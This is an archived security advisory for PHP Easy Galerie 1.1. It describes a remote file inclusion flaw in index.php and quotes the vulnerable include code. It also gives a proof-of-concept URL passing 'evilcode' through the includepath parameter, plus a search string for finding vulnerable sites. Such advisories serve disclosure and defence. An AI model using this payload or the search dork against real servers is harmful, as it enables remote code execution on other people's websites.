TUCoPS :: Web :: PHP :: b06-2349.htm

PHP Easy Galerie Index.PHP Remote File Include Vulnerability
PHP Easy Galerie Index.PHP Remote File Include Vulnerability
PHP Easy Galerie Index.PHP Remote File Include Vulnerability



Vendor: Power-Place =0D
www.power-place.net=0D 
       (PHP Easy Galerie 1.1)=0D
-------------------------------------------------=0D
Author:Craziest=0D
Contact: craziest(at)gmail(dot)com=0D
Vuln discovered by BrEakerS=0D
--------------------------------------------------=0D
Method:An attacker can exploit this issue to include =0D
an arbitrary remote file containing malicious PHP code and execute =0D
it in the context of the webserver process by=0D
source:=0D
if(isset($includepath)){=0D
	include ("$includepath");=0D
=0D
http://[url]/gallerypath/index.php?includepath=evilcode=0D 
=0D
Search:"Power-Place 2003/2004"=0D
--------------------------------------------------------=0D
Greets:Rootshell Security Group

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH